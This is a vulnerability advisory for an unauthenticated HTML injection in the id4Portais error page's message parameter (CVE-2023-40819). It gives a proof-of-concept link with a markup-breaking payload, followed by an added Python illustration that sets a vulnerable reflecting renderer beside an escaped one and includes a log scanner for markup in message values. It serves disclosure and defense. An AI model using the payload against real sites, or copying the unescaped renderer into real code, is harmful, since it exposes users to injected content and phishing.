# Exploit Title: id4Portais <= V.2022.837.002a - HTML Injection
# Date: 03/08/2024
# Exploit Author: Miguel Santareno
# Vendor Homepage: https://devlop.systems/
# Software Link: https://devlop.systems/software/gestao-documental/
# Version: <= V.2022.837.002a
# Tested on: Google and Firefox latest version
# CVE : CVE-2023-40819

# 1. Description
Unauthenticated users can inject HTML into the message parameter of id4Portais <= V.2022.837.002a, because the value of the message parameter is reflected into the page without sanitization or encoding.

# 2. Proof of Concept (PoC)
To exploit this, an attacker needs to send the victim a link to the vulnerable error page carrying the payload in the message parameter:
https://website.com/error?message='">Clickme!
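The following is an added illustration, not id4Portais code: it models an error page that reflects the message parameter verbatim beside a hardened version that HTML-encodes it, and a small log check that flags message values carrying markup characters. The route name /error and the parameter name message come from the advisory; the template markup, the sample log lines and the payload body are constructed.

```python
"""Reflection of an error-page `message` parameter: vulnerable vs. hardened."""
import html
from urllib.parse import parse_qs, urlsplit

# Constructed sample: same quote/angle-bracket prefix shape as the advisory's
# PoC, followed by harmless bold markup so the effect is visible.
SAMPLE_MESSAGE = "'\"><b>Clickme!</b>"


def render_error_vulnerable(message: str) -> str:
    """Reflects the parameter as-is; the browser parses any '<', '>' or quotes
    in it as markup, which is the defect the advisory describes."""
    return f"<p class='error'>{message}</p>"


def render_error_hardened(message: str) -> str:
    """html.escape(quote=True) encodes &, <, >, \" and ' so the value can only
    render as text, whatever characters the request carried."""
    return f"<p class='error'>{html.escape(message, quote=True)}</p>"


def reflects_raw_input(rendered: str, message: str) -> bool:
    """True when the user-supplied string survives unencoded in the output."""
    return message in rendered


def flag_markup_in_message(request_lines):
    """Scan request lines of the form 'GET <target> HTTP/1.1' (constructed
    access-log style) and return decoded message values containing markup
    characters; useful for spotting attempts against the /error page."""
    hits = []
    for line in request_lines:
        target = line.split()[1]
        params = parse_qs(urlsplit(target).query)  # also percent-decodes
        for value in params.get("message", []):
            if any(c in value for c in "<>\"'"):
                hits.append(value)
    return hits


# Constructed log lines: one benign request, one carrying encoded markup.
SAMPLE_LOG = [
    "GET /error?message=Session+expired HTTP/1.1",
    "GET /error?message=%27%22%3E%3Cb%3EClickme!%3C/b%3E HTTP/1.1",
]

if __name__ == "__main__":
    print(render_error_vulnerable(SAMPLE_MESSAGE))
    print(render_error_hardened(SAMPLE_MESSAGE))
    print(flag_markup_in_message(SAMPLE_LOG))
```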